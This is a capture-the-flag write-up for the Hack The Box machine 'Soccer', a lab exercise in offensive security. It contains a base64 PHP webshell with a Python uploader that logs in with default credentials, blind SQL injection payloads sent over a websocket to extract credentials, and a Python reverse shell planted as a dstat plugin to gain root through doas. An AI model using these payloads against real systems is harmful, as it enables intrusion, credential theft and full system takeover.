# Soccer - HTB

[[_TOC_]]

## Summary

<!-- markdownlint-disable MD033 -->
<div align="center"><img width="560" height="424" src="images/0.png"></div>

Soccer is a delightful easy-rated HTB machine created by [sau123](https://app.hackthebox.com/users/201596)

Thanks to Tiny File Manager using default credentials, we'd find an arbitrary file upload. We can upload a PHP webshell and get access as `www-data`. It allows us to spot a subdomain in `nginx` config.  
On that subdomain, we can find a blind boolean injection vulnerability over websocket. To abuse that, we get acquainted with SQL queries and implement binary search to enumerate the database.  
We exploit a `dstat` entry in `doas.conf` to get root.

## Initial recon

```console
opcode@parrot$ nmap -v -p- --min-rate 2000 10.10.11.194
Nmap scan report for 10.10.11.194
Host is up (0.17s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
9091/tcp open  xmltec-xmlmail
```

```console
opcode@parrot$ nmap -sC -sV -p 22,80,9091 -oN soccer.nmap 10.10.11.194
Nmap scan report for 10.10.11.194
Host is up (0.16s latency).

PORT     STATE SERVICE         VERSION
22/tcp   open  ssh             OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 ad:0d:84:a3:fd:cc:98:a4:78:fe:f9:49:15:da:e1:6d (RSA)
|   256 df:d6:a3:9f:68:26:9d:fc:7c:6a:0c:29:e9:61:f0:0c (ECDSA)
|_  256 57:97:56:5d:ef:79:3c:2f:cb:db:35:ff:f1:7c:61:5c (ED25519)
80/tcp   open  http            nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://soccer.htb/
9091/tcp open  xmltec-xmlmail?
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, Help, RPCCheck, SSLSessionReq, drda, informix: 
|     HTTP/1.1 400 Bad Request
|     Connection: close
|   GetRequest: 
|     HTTP/1.1 404 Not Found
|     Content-Security-Policy: default-src 'none'
|     X-Content-Type-Options: nosniff
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 139
|     Date: Wed, 21 Dec 2022 17:25:46 GMT
|     Connection: close
|     <!DOCTYPE html>
|     <html lang="en">
|     <head>
|     <meta charset="utf-8">
|     <title>Error</title>
|     </head>
|     <body>
|     <pre>Cannot GET /</pre>
|     </body>
|     </html>
|   HTTPOptions, RTSPRequest: 
|     HTTP/1.1 404 Not Found
|     Content-Security-Policy: default-src 'none'
|     X-Content-Type-Options: nosniff
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 143
|     Date: Wed, 21 Dec 2022 17:25:46 GMT
|     Connection: close
|     <!DOCTYPE html>
|     <html lang="en">
|     <head>
|     <meta charset="utf-8">
|     <title>Error</title>
|     </head>
|     <body>
|     <pre>Cannot OPTIONS /</pre>
|     </body>
|_    </html>
```

Besides the usual SSH (22) and HTTP (80) ports, we also have port 9091.

Upon visiting the website on port 80, we'd be redirected to <http://soccer.htb/>  
Hence, we can add this line to `/etc/hosts`:

```text
10.10.11.194 soccer.htb
```

The website loads now:

![1](images/1.png)

There are no other links on the website.

I tried to enumerate subdomains with `ffuf`, but found nothing.  
On the contrary, `dir` bruteforce brought an interesting result:

```console
opcode@parrot$ ffuf -c -w ~/wordlists/raft-small-words.txt -u http://soccer.htb/FUZZ -mc all -fs 162 2>/dev/null
.                       [Status: 200, Size: 6917, Words: 2196, Lines: 148, Duration: 97ms]
tiny                    [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 84ms]
```

## Tiny File Manager

<http://soccer.htb/tiny> takes us to the login page for [Tiny File Manager](https://tinyfilemanager.github.io/)  
Both the default credentials for Tiny File Manager work here:

```text
user:12345
admin:admin@123
```

`admin` has more privileges, so I'd use that one.  
Inside, we have a file manager containing files responsible for the web server.

We have `0644` i.e. `rw-r--r--` over every file in the root directory.  
Over the `tiny` directory, we have `0755` i.e. `rwxr-xr-x`.  
We also have `0757` i.e. `rwxr-xrwx` over `tiny/uploads` directory.  
Hence, we can try uploading a PHP webshell here. After uploading, it shows the destination directory `/var/www/html/tiny/uploads`  
The webshell works:

```console
opcode@parrot$ curl 'http://soccer.htb/tiny/uploads/webshell.php?cmd=id'
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```

Working with this box on public instances was troublesome because it was being reset very frequently. So I created an autopwner for this part in python, [run_commands.py](run_commands.py):

```py
from uuid import uuid4
from base64 import b64decode

from socket import socket, AF_INET, SOCK_DGRAM, inet_ntoa
from struct import pack
from fcntl import ioctl

import requests
import cmd


class WebshellPrompt(cmd.Cmd):
    prompt = '$ '

    def default(self, line):
        output = os_command(filename, line)
        print(output)

    def do_exit(self, arg):
        return True


def login(username, password):
    payload = {'fm_usr': username, 'fm_pwd': password}

    sess = requests.Session()
    sess.get(URL + '/tiny', proxies=proxy)
    r = sess.post(URL + '/tiny/tinyfilemanager.php', data=payload, proxies=proxy)

    return sess


def upload_webshell(session):
    filename = str(uuid4()) + '.php'
    file_contents = b64decode(WEBSHELL_B64)

    file = {'file': (filename, file_contents, 'application/x-php'),
            'p': (None, 'tiny/uploads'),
            'fullpath': (None, filename)}

    sess = session
    r = sess.post(URL + '/tiny/tinyfilemanager.php?p=tiny/uploads', files=file, proxies=proxy)

    return filename


def os_command(filename, command):
    url = f'{URL}/tiny/uploads/{filename}'
    header = {'Accept-Language': command}

    r = requests.get(url, headers=header, proxies=proxy)

    return r.text


def get_tun_ip():
    sock = socket(AF_INET, SOCK_DGRAM)
    packed_addr = ioctl(sock.fileno(), 0x8915, pack('256s', b'tun0'))[20:24]
    return inet_ntoa(packed_addr)


if __name__ == "__main__":
    URL = 'http://soccer.htb'
    WEBSHELL_B64 = 'PD9waHAgc3lzdGVtKCRfU0VSVkVSW0hUVFBfQUNDRVBUX0xBTkdVQUdFXSk7ID8+'

    proxy = {}
    # proxy['http'] = 'http://127.0.0.1:8080'

    session = login('admin', 'admin@123')
    filename = upload_webshell(session)

    prompt = WebshellPrompt()
    prompt.cmdloop()
```

It works fine:

![2](images/2.png)

Still, it is not a proper shell. And it would stop working when the cleanup cron job deletes our webshell.
So I recommend switching to a more stable shell.

## Finding a subdomain

We can now transfer `linpeas.sh` and run it. It finds clues for the next step.

```console
www-data@soccer:~$ cat /proc/mounts | grep hidepid
proc /proc proc rw,nodev,relatime,hidepid=2 0 0
```

Since `/proc` has been mounted with `hidepid=2` option, we cannot enumerate with `pspy`.

```console
www-data@soccer:~$ netstat -tulnp
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 127.0.0.1:33060         0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      1103/nginx: worker  
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:3000          0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:9091            0.0.0.0:*               LISTEN      -                   
tcp6       0      0 :::80                   :::*                    LISTEN      1103/nginx: worker  
tcp6       0      0 :::22                   :::*                    LISTEN      -                   
udp        0      0 127.0.0.53:53           0.0.0.0:*                           -                   
udp        0      0 0.0.0.0:68              0.0.0.0:*                           -                   
```

We also have a MySQL server and another webserver on internally accessible ports 3306 and 3000 respectively.  
We can investigate `nginx` configs for that:

```console
www-data@soccer:~$ ls /etc/nginx/sites-enabled/
default  soc-player.htb
```

Besides the default config, we also have `soc-player.htb`

```console
www-data@soccer:~$ cat /etc/nginx/sites-enabled/soc-player.htb 
server {
  listen 80;
  listen [::]:80;

  server_name soc-player.soccer.htb;

  root /root/app/views;

  location / {
    proxy_pass http://localhost:3000;
    proxy_http_version 1.1;
    proxy_set_header Upgrade $http_upgrade;
    proxy_set_header Connection 'upgrade';
    proxy_set_header Host $host;
    proxy_cache_bypass $http_upgrade;
  }

}
```

It should be accessible externally through the subdomain.  
We can update `/etc/hosts`:

```text
10.10.11.194 soccer.htb soc-player.soccer.htb
```

It looks similar to the other website, but we have more options here:

![3](images/3.png)

The registration and login pages are functional and allow us to log-in.  
After loggin in, it takes us to `/check`  
It tells us our Ticket ID: 66809

![4](images/4.png)

It also acts as a ticket validator. Oddly enough, no burpsuite traffic is generated for ticket validation.  
Suspecting a client-side mechanism, if we look at the page source, we'd find that it actually uses websockets:

```js
  var ws = new WebSocket("ws://soc-player.soccer.htb:9091");
  window.onload = function () {
  
  var btn = document.getElementById('btn');
  var input = document.getElementById('id');
  
  ws.onopen = function (e) {
      console.log('connected to the server')
  }
  input.addEventListener('keypress', (e) => {
      keyOne(e)
  });
  
  function keyOne(e) {
      e.stopPropagation();
      if (e.keyCode === 13) {
          e.preventDefault();
          sendText();
      }
  }
  
  function sendText() {
      var msg = input.value;
      if (msg.length > 0) {
          ws.send(JSON.stringify({
              "id": msg
          }))
      }
      else append("????????")
  }
  }
  
  ws.onmessage = function (e) {
  append(e.data)
  }
  
  function append(msg) {
  let p = document.querySelector("p");
  // let randomColor = '#' + Math.floor(Math.random() * 16777215).toString(16);
  // p.style.color = randomColor;
  p.textContent = msg
  }
```

## Interacting with websocket

We can create our own script in JavaScript to interact with this websocket.  

```js
const WebSocket = require("ws");
const prompt = require("prompt-sync")({ sigint: true });

async function main() {
  const socket = new WebSocket("ws://soc-player.soccer.htb:9091");

  await new Promise((resolve) => {
    socket.on('open', resolve);
  });

  while (true) {
    let userInput = prompt(">> ");
    let payload = JSON.stringify({ id: userInput });
    socket.send(payload);

    const response = await new Promise((resolve) => {
      socket.on('message', resolve);
    });

    console.log(`Response: ${response}`);
  }
}

main();
```

But first, we need to install the prerequisites:

```console
opcode@parrot$ cd /tmp
opcode@parrot$ npm install ws
opcode@parrot$ npm install prompt-sync
```

And now we can interact with the websocket:

```console
opcode@parrot$ rlwrap -a node sock.js
>> 1337
Response: Ticket Doesn't Exist
>> 1; id
Response: Ticket Doesn't Exist
>> 1 or 1=1 -- -
Response: Ticket Exists
```

## Blind boolean injection over websocket

With some trial and error, we can figure out that this ticket validator is vulnerable to blind boolean injection:

```console
opcode@parrot$ rlwrap -a node sock.js
>> 37 or 1
Response: Ticket Exists
>> 37 or 0
Response: Ticket Doesn't Exist
```

But [sqlmap](https://github.com/sqlmapproject/sqlmap) didn't support websockets at the time of box release.  
So I decided to write a tool myself.  
I had never written any JavaScript code before, so it was an excellent opportunity to learn.

Food for thought: it will take terribly long if we enumerate all characters individually. A better approach in such cases is to use binary search.

In the binary search approach, we start by determining the search space's lower and upper bound. We then find the middle point, dividing the search space into two parts.  
Next, we query one of the parts for the expected value. Based on the response (positive or negative), we update the search space by selecting the corresponding half and adjusting the lower and upper bounds.  
We repeat this process by finding the middle point of the updated search space and querying the selected part until the desired value is found.

With that out of the way, we can get to writing SQL queries.

We need to count the number of databases first. For that, my queries were:

```js
let payload = `37 or (select count(schema_name) from information_schema.schemata) = ${count}`;
```

It found 5 databases:

![5](images/5.png)

We need to figure out the number of letters in the names of these database names now:

```js
let avg = Math.floor((min + max) / 2);
let payload = `37 or (select length(schema_name) from information_schema.schemata limit ${dbIndex},1) > ${avg}`;
```

`min` and `max` are lower and upper bounds, respectively. It found the lengths:

![6](images/6.png)

Onto the database names now:

```js
let avg = Math.floor((min + max) / 2);
let payload = `37 or (select ord(substr(schema_name,${charIndex},1)) from information_schema.schemata limit ${dbIndex},1) > ${avg}`;
```

It ran for a while and found them:

![7](images/7.png)

`soccer_db` is the database of interest.  
Now, we need to find the number of tables:

```js
let payload = `37 or (select count(table_name) from information_schema.tables where table_schema='${db}') = ${count}`;
```

It found just one:

![8](images/8.png)

Number of characters in the table name:

```js
let avg = Math.floor((min + max) / 2);
let payload = `37 or (select length(table_name) from information_schema.tables where table_schema='${db}' limit ${tableIndex},1) > ${avg}`;
```

It found 8:

![9](images/9.png)

Table name:

```js
let avg = Math.floor((min + max) / 2);
let payload = `37 or (select ord(substr(table_name,${charIndex},1)) from information_schema.tables where table_schema='${db}' limit ${tableIndex},1) > ${avg}`;
```

Found table `accounts`:

![10](images/10.jpg)

Number of columns:

```js
let payload = `37 or (select count(column_name) from information_schema.columns where table_name='${table}' and table_schema='${db}') = ${count}`;
```

Found 4 columns:

![11](images/11.png)

Number of characters in each column name:

```js
let avg = Math.floor((min + max) / 2);
let payload = `37 or (select length(column_name) from information_schema.columns where table_name='${table}' and table_schema='${db}' limit ${columnIndex},1) > ${avg}`;
```

It found them:

![12](images/12.png)

Enumerating column names:

```js
let avg = Math.floor((min + max) / 2);
let payload = `37 or (select ord(substr(column_name,${charIndex},1)) from information_schema.columns where table_name='${table}' and table_schema='${db}' limit ${columnIndex},1) > ${avg}`;
```

Found a bunch of interesting ones:

![13](images/13.png)

Number of rows in table:

```js
let payload = `37 or (select count(${column}) from ${table}) = ${count}`;
```

Found just one:

![14](images/14.png)

Number of characters in each entry:

```js
let avg = Math.floor((min + max) / 2);
let payload = `37 or (select length(${column}) from ${table} limit 0,1) > ${avg}`;
```

Enumerating the entries:

```js
let avg = Math.floor((min + max) / 2);
let payload = `37 or (select ord(substr(${column},${charIndex},1)) from ${table} limit 0,1) > ${avg}`;
```

It ran for a while, and we finally got the following:

![15](images/15.png)

On a side note, my bounds for names were in a range that covered the alphabet, periods, underscore and some other characters. I think I had changed the bounds to enclose all ascii printables for the password.

My entire code is available at [blind_sqli_enum.js](blind_sqli_enum.js), but it isn't very pleasant, to be honest.

## Privilege escalation with `doas` and `dstat`

We have a set of credentials now:

```text
player:PlayerOftheMatch2022
```

They work for SSH:

```console
opcode@parrot$ sshpass -p 'PlayerOftheMatch2022' ssh -o StrictHostKeyChecking=no player@soccer.htb
```

`linpeas.sh` detects an unusual binary with SUID privileges:

```console
player@soccer:~$ find / -perm -u=s 2>/dev/null
/usr/local/bin/doas
/usr/lib/snapd/snap-confine
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/bin/umount
/usr/bin/fusermount
/usr/bin/mount
/usr/bin/su
/usr/bin/newgrp
[--SNIP--]
```

`doas` is the OpenBSD alternative to `sudo`. I've seen a privesc with SUID `doas` in another HTB box.  
Oddly enough, `linpeas.sh` didn't highlight the `doas` config this time.  
I think it is due to the unusual install location.

But we can search for it ourselves:

```console
player@soccer:~$ find / -name doas.conf 2>/dev/null
/usr/local/etc/doas.conf
```

We can look at the contents:

```console
player@soccer:~$ cat /usr/local/etc/doas.conf 
permit nopass player as root cmd /usr/bin/dstat
```

`dstat` is a tool used to monitor system resources.  
It has a GTFObins page <https://gtfobins.github.io/gtfobins/dstat/>, where it is mentioned that we can load python scripts as arbitrary plugins if we have write permissions over one of the directories stated in the `dstat` man page:

```text
~/.dstat/
(path of binary)/plugins/
/usr/share/dstat/
/usr/local/share/dstat/
```

We do own one of these:

```console
player@soccer:~$ find / -group player 2>/dev/null | grep -v '/home\|/proc\|/sys\|/tmp\|/run'
/usr/local/share/dstat
```

So, create a malicious python script, `dstat_opcode.py` with the contents:

```py
import socket, os, pty
s = socket.socket()
s.connect(('10.10.14.74',9001))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
pty.spawn('/bin/bash')
```

We can put it inside `/usr/local/share/dstat` and run the command:

```console
player@soccer:~$ doas -u root /usr/bin/dstat --opcode
```

This should give us a reverse shell as root:

```console
root@soccer:/home/player# id
uid=0(root) gid=0(root) groups=0(root)
```
